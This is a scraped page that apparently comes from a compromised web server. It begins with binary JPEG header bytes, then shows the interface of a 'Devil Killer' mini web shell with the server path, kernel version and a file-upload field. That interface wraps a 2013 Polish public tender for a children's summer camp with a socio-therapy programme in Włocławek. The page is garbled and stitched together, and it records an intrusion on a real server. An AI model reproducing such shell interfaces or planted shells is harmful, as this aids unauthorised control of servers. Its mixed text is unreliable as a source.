JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130423/160378-N-2013.html

<p class="kh_header"><b>Włocławek: ZORGANIZOWANIE WYPOCZYNKU LETNIEGO W FORMIE KOLONII STACJONARNYCH Z REALIZACJĄ PROGRAMU SOCJOTERAPEUTYCZNEGO DLA 90 DZIECI I MŁODZIEŻY SZKOLNEJ</b><br>
<b>Numer ogłoszenia: 160378 - 2013; data zamieszczenia: 23.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Kościuszki 26, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4116399, faks 054 4116399.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mopr.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE WYPOCZYNKU LETNIEGO W FORMIE KOLONII STACJONARNYCH Z REALIZACJĄ PROGRAMU SOCJOTERAPEUTYCZNEGO DLA 90 DZIECI I MŁODZIEŻY SZKOLNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie w okresie od dnia 01 lipca 2013 r. do dn  31 sierpnia 2013 r. wypoczynku letniego w formie kolonii stacjonarnych, z realizacją programu socjoterapeutycznego dla 90 dzieci i młodzieży szkolnej w wieku od 8 do 15 lat, które korzystają ze Świetlic Miejskiego Ośrodka Pomocy Rodzinie we Włocławku, według następujących turnusów: 1) CZĘŚĆ I - 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej nad polskim morzem. 2) CZĘŚĆ II - 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej w polskich górach. 2. Każdy z opisanych w pkt 1 turnusów stanowi odrębną część zamówienia. 3. Miejscem wypoczynku - zakwaterowania - dzieci i młodzieży musi być budynek/budynki murowany/e (nie mogą być namioty, domki campingowe, pawilony). Proponowana baza lokalowa wraz z wyposażeniem, dostępnym zapleczem sanitarnym, rekreacyjnym, sportowym stanowi element składowy oceny ofert w kryterium standard placówki wypoczynku. Obiekt, spełniając wymagane przepisami Prawa budowlanego normy, musi jednorazowo pomieścić liczbę kolonistów, odpowiadającą rozdzielonym na części przedmiotu zamówienia turnusom. 4. Każdy turnus obejmuje 9 noclegów. Liczba dzieci w pokoju jest proponowana przez wykonawcę i stanowi element składowy oceny ofert w kryterium standard placówki wypoczynku. 5. Każdy turnus kolonijny obejmuje całodzienne wyżywienie kolonistów w wieku od 8 do 15 lat (tj. 4 pełne posiłki dziennie, w tym co najmniej jeden gorący - dwudaniowy, łączna wartość energetyczny posiłków nie może być niższa, niż podane w załączniku nr 1 do SIWZ normy żywienia dla ludności Polski). Turnus musi rozpoczynać się i kończyć obiadem, czyli w każdym turnusie musi być 10 obiadów. Poza tym wymagany jest suchy prowiant i napój dla każdego kolonisty na drogę powrotną oraz stały dostęp kolonistów do dodatkowych napojów w ciągu dnia w trakcie trwania każdego turnusu. 6. Podane w pkt 5 normy stanowią wymagane niezbędne minimum. Jednocześnie, minimalna, dzienna stawka żywieniowa w każdym turnusie nie może być niższa niż 20,00 zł. 7. Transport dzieci do miejsca pobytu i z powrotem po zakończeniu turnusu jest elementem zamówienia i organizowany jest przez wykonawcę. W ramach turnusu zobowiązany jest on zapewnić sprawny, ubezpieczony (OC i NNW pasażerów) autokar z min. 50 miejscami siedzącymi oraz odpowiednią liczbę uprawnionych kierowców (biorąc pod uwagę przewidywany czas jazdy w odniesieniu do liczby kilometrów, zgodnie z obowiązującymi normami - tak, by uniknąć przestojów na odpoczynek kierowcy). Zamawiający wyklucza dowóz dzieci w godzinach nocnych, tzn. między godziną 22 00 a godziną 600. 8. Podczas wszystkich przejazdów środkami transportu (dowóz do miejsca wypoczynku, przewozy w trakcie trwania turnusów, przywóz do miejsca zamieszkania), wykonawca zapewnia kolonistom opiekę uprawnionych wychowawców, w liczbie zgodnej z normami określonymi w rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jej organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 i Nr 18, poz. 102 oraz z 2009 r. Nr 218, poz. 1696). 9. W czasie trwania turnusów określonych w CZĘŚCI I oraz CZĘŚCI II wykonawca zapewnia codzienną, całodobową opiekę 3 uprawnionych wychowawców, odrębnie dla każdej części. Za uprawnionych wychowawców uznaje się spełniających wymagania określone w rozporządzeniu przywołanym w pkt 8. 10. Nadzór nad każdym turnusem musi sprawować uprawniony kierownik kolonii, który nie może jednocześnie pełnić obowiązków wychowawcy, i którego osoba nie wlicza się do liczby wychowawców, o których mowa w pkt 9. Za uprawnionego kierownika uznaje się osobę spełniającą wymagania określone w rozporządzeniu przywołanym w pkt 8.Kierownik kolonii może stanowić kadrę realizującą program socjoterapeutyczny, jeżeli posiada opisane w pkt 19 kwalifikacje. 11. Wykonawca zobowiązany jest zapewnić kolonistom opiekę pielęgniarską poprzez całodobową obecność pielęgniarki w miejscu wypoczynku dzieci oraz lekarską poprzez podpisanie umowy z gabinetem podstawowej opieki zdrowotnej oraz zabezpieczyć podstawowe leki, niezbędne środki medyczne oraz materiały opatrunkowe. 12. Wykonawca zapewnia opiekę ratownika z odpowiednimi kwalifikacjami dla dzieci przebywających nad wodą bądź korzystających z kąpieli oraz kąpielisk, na czas trwania wypoczynku, zgodnie z obowiązującymi przepisami. 13. Wykonawca organizuje wycieczki krajoznawczo - turystyczne i górskie (dotyczy części II zamówienia) w sposób określony w odrębnych przepisach. 14. Wykonawca ubezpiecza wychowawców, kierownika kolonii i ratownika poprzez wykupienie dla personelu polis OC. 15. Wykonawca ubezpiecza dzieci w zakresie NNW przez cały okres trwania turnusu kolonijnego (od chwili zbiórki dzieci przed wyjazdem do chwili powrotu z kolonii do Włocławka). 16. Wykonawca, mając na uwadze wiek i liczbę kolonistów w danym turnusie, wyznaczającą ilość grup kolonijnych, zapewnia prawidłową organizację zabaw i zajęć zespołowych z dziećmi i młodzieżą, uwzględniając m. in.: piesze spacery i zajęcia w plenerze, zajęcia kulturalne, edukacyjne, rekreacyjne, sportowe, krajoznawcze, muzyczne, plastyczne, dostęp do urządzeń sportowych, sprzętu nagłaśniającego, TV-audio-video, basenu, boiska, placu zabaw, organizacji ogniska itp.  Atrakcyjność programu stanowi podstawę oceny ofert w kryterium program pobytu. 17. Program pobytu powinien uwzględniać: organizację różnorodnych, aktywnych, bezpiecznych i zdrowych form spędzania czasu wolnego, poznanie kraju jego środowiska przyrodniczego, tradycji, zabytków kultury i historii, poszerzenie wiedzy z różnych dziedzin życia społecznego i kulturalnego, odreagowanie napięć emocjonalnych, zajęcia na korzystne i niekorzystne warunki meteorologiczne. 18. Wykonawca podczas turnusu zobowiązany jest zorganizować kolonistom co najmniej jedną całodniową, autokarową wycieczkę poznawczą o charakterze turystyczno-krajoznawczą z atrakcjami (wyjazd po śniadaniu i powrót na obiadokolację). Miejsce docelowe wycieczki musi być oddalone o min. 50 km od miejsca zakwaterowania dzieci. Atrakcyjność programu wycieczki stanowi element oceny ofert w kryterium program pobytu. Wyjazd na wycieczkę nie zwalnia wykonawcy z obowiązku właściwego wyżywienia dzieci i młodzieży. Wykonawca organizuje wycieczki krajoznawczo - turystyczne w sposób określony w odrębnych przepisach. 19. Poza zajęciami określonymi w pkt 16 i pkt 17, wykonawca zobowiązany jest zapewnić realizację, dostosowanego do wieku uczestników kolonii, programu socjoterapeutycznego z wykorzystaniem aktywnych metod pracy warsztatowej. Program powinien być realizowany przez 8 dni w wymiarze 90 minut dziennie w grupach liczących maksymalnie 15 osób. Program powinien uwzględniać nabycie wiedzy i umiejętności z zakresu: profilaktyki uzależnień, prawidłowej komunikacji interpersonalnej, przestrzegania norm społecznych, rozpoznawania uczuć i emocji, sposobów radzenia sobie z agresją i złością. Program zajęć socjoterapetucznych stanowi element oceny ofert w kryterium program pobytu. 20. Wykonawca zapewnia materiały dydaktyczne niezbędne do realizacji programu socjoterapeutycznego m.in. papier, kredki i inne materiały do prowadzenia ćwiczeń. 21. Program socjoterapeutyczny musi być realizowany przez co najmniej jedną osobę posiadającą następujące kwalifikacje: 1) ukończone studia magisterskie (dyplom) na kierunku: pedagogika, psychologia, praca socjalna lub nauki o rodzinie oraz dodatkowe uprawnienia opisane w ppkt 2) lub 3), 2) ukończone studia podyplomowe (świadectwo) z zakresu: socjoterapii, profilaktyki uzależnień, diagnozy i terapii pedagogicznej, profilaktyki i resocjalizacji, psychoprofilaktyki, pomocy psychologicznej, terapii rodziny, przeciwdziałania przemocy w rodzinie, interwencji kryzysowej, mediacji rodzinnych, 3) odbyte szkolenie, seminarium, kurs doskonalący, kwalifikacyjny z zakresu profilaktyki uzależnień (zaświadczenie). 22. Z realizacji programu socjoterapeutycznego wykonawca przedłoży zamawiającemu końcowe sprawozdanie merytoryczne, zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ, w terminie 14 dni, licząc od dnia zakończenia turnusu kolonijnego. Przyjęcie przez zamawiającego sprawozdania będzie podstawą do wystawienia a następnie zapłaty faktury za zrealizowanie turnusu. 23. Każdy wychowawca, jak i kierownik kolonii zobowiązany jest prowadzić dokumentację z przebiegu kolonii w zakresie swoich kompetencji, zgodnie z § 12 ust. 4 rozporządzenia przywołanego w pkt 8. 24. Karty kwalifikacyjne uczestników kolonii (według wzoru określonego w przywołanym w  pkt 8 rozporządzeniu) przygotowuje wykonawca i przekazuje je zamawiającemu w dniu podpisania umowy. 25. Wymagania określone w rozdziale II SIWZ dotyczą z uwzględnieniem specyfiki miejsca pobytu obydwu części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 60.17.00.00-0, 63.51.10.00-4, 66.61.21.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie niniejszego warunku przez wykonawcę w zakresie organizacji wypoczynku letniego dzieci i młodzieży szkolnej potwierdza wpis do rejestru organizatorów turystyki i pośredników turystycznych prowadzony przez marszałka województwa właściwego ze względu na siedzibę wykonawcy, a w przypadku wykonawcy zagranicznego wpis do rejestru prowadzonego przez marszałka województwa przez niego wybranego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 3 turnusów kolonijnych na terenie Polski - na każdą z części, dla min. 45 dzieci, które rodzajem, zakresem i wartością odpowiadają turnusom kolonijnym określonym w niniejszym postępowaniu. Przez odpowiedni rodzaj, rozumie się zorganizowanie kolonii letnich dla dzieci i młodzieży w wieku od 8 do 15 lat z rodzin korzystających ze świadczeń pomocy społecznej, sprawiających problemy opiekuńczo - wychowawcze oraz wykazujących zaburzenia zachowania i zaburzenia w sferze emocjonalnej (np. kolonie organizowane dla ośrodków pomocy społecznej, kuratorium oświaty, placówek opiekuńczo - wychowawczych, urzędów gmin, organizacji pozarządowych, fundacji, komisji rozwiązywania problemów alkoholowych, oraz instytucji działających w obszarze pomocy społecznej lub edukacji). Przez odpowiedni zakres, rozumie się organizowanie wypoczynku trwającego nie krócej niż 10 dni, uwzględniającego realizację programu profilaktyczno - wychowawczego lub programu socjoterapeutycznego, przez minimum 10 godzin dla każdego kolonisty w trakcie pobytu na turnusie. Przez odpowiednią wartość, rozumie się realizację usług turystycznych o wartości co najmniej 80 % ceny brutto oferty składanej w niniejszym postępowaniu. W przypadku składania oferty przez podmioty występujące wspólnie, niniejszy warunek musi spełniać co najmniej jeden podmiot. Wykonawca zobowiązany jest dołączyć dokumenty (np. referencje) potwierdzające organizowanie wypoczynku z uwzględnieniem ww. wymogów oraz, że przedmiotowe usługi zostały wykonane należycie.
Warunek wiedzy i doświadczenia należy potwierdzić przedłożeniem minimum 3 rekomendacji - na każdą z części , z których wynika: zorganizowanie przez wykonawcę wypoczynku letniego dla dzieci na terenie Polski, wykonanie usługi w sposób należyty, realizacja usług turystycznych o wartości co najmniej 80% ceny brutto oferty składanej w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował: 1) placówką wypoczynkową o bazie lokalowej dla minimum 45 kolonistów i zapleczem technicznym do wydawania posiłków dla minimum 45 kolonistów jednorazowo; 2) baza noclegowa dzieci i młodzieży, niezależnie od turnusu, musi posiadać odpowiednią liczbę sanitariatów i łazienek, zgodnie z obowiązującymi wymogami. Dodatkowo wykonawca zobowiązany jest podać w ilu osobowych pokojach, będą wypoczywać dzieci, opisać wyposażenie pokoi, dostępność i wyposażenie łazienek (czy w pokojach, czy na korytarzu), wyposażenie placówki wypoczynkowej w świetlice i sale telewizyjne, wyposażenie terenu wokół obiektu w boiska sportowe oraz położenie placówki względem odległości w kilometrach od miejsc atrakcji, ujętych w harmonogramie pobytu, a w szczególności docelowego miejsca wycieczki autokarowej, odległości od strzeżonego kąpieliska (w przypadku części I). Potwierdzeniem spełniania warunków dotyczących potencjału technicznego będzie między innymi sporządzona przez wykonawcę dwuczęściowa charakterystyka placówki wypoczynkowej, uwzględniająca w pierwszym segmencie opis bazy noclegowej przeznaczonej dla kolonistów zamawiającego i ich wyłączny dostęp do sprzętu i wyposażenia, a w drugim segmencie informacje na temat liczby budynków na terenie placówki i ich funkcji - jeśli istnieje więcej niż jeden, pobytu innych grup kolonijnych w placówce w oferowanym zamawiającemu terminie. Wskazane jest aby opis był uzupełniony zdjęciami, prospektami i innymi folderami obrazującymi zawarte dane. Charakterystyka placówki wypoczynkowej stanowiła będzie podstawę do oceny oferty w kryterium standard placówki wypoczynku.; 3) dysponowanie sprawnym technicznie, ubezpieczonym, klimatyzowanym autokarem do przewozu jednorazowo, co najmniej 45 osób. Potwierdzeniem niniejszego wymogu jest złożenie przez wykonawcę informacji o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zapewnić potencjał kadrowy niezbędny do organizowanego wypoczynku zgodnie z obowiązującymi przepisami rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. Nr 12, poz. 67 i Nr 18, poz. 102 oraz z 2009 r. Nr 218, poz. 1696) w osobach: 1) kierownik kolonii, spełniający wymagania określone w § 11 ww. rozporządzenia, 2) 3 wychowawców, spełniających wymagania określone w § 12 ww. rozporządzenia, 3) co najmniej 1 osoba do realizacji programu profilaktyczno - wychowawczego, posiadająca uprawnienia opisane w rozdziale II SIWZ w pkt 19, 4) stały pobyt ratownika w miejscu pobytu dzieci (dotyczy części I zamówienia), 5) dysponowanie osobami w ilości zapewniającej terminowe przygotowywanie sprawne wydawanie posiłków, w tym również osoby odpowiedzialnej za wartość kaloryczną przygotowywanych posiłków, 6) zapewnienie opieki medycznej - stały pobyt w placówce wypoczynkowej pielęgniarki oraz podpisanie umowy z gabinetem podstawowej opieki zdrowotnej w zakresie opieki lekarskiej, 7) zapewnienie uprawnionych kierowców w liczbie wymaganej turnusem, uzależnionej od liczby dzieci do przewozu oraz przewidywanego czasu trwania jednorazowej jazdy do docelowego miejsca, uzależnionej od odległości, mierzonej w kilometrach i dopuszczalnej prędkości jazdy w km/h, 8) wykonawca zobowiązany jest wykupić polisy ubezpieczeniowe od OC na czas trwania turnusu osobom wymienionym w ppkt od 1) do 4), 9) potwierdzeniem spełniania warunku dysponowania osobami zdolnymi do wykonania oferowanego turnusu jest sporządzenie przez wykonawcę wykazu kadry uwzględniającego wymogi zamawiającego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku wykonawca potwierdza poprzez posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia w wysokości 40 000,00 zł na wszystkie zdarzenia na każdą z części, na które wykonawca składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

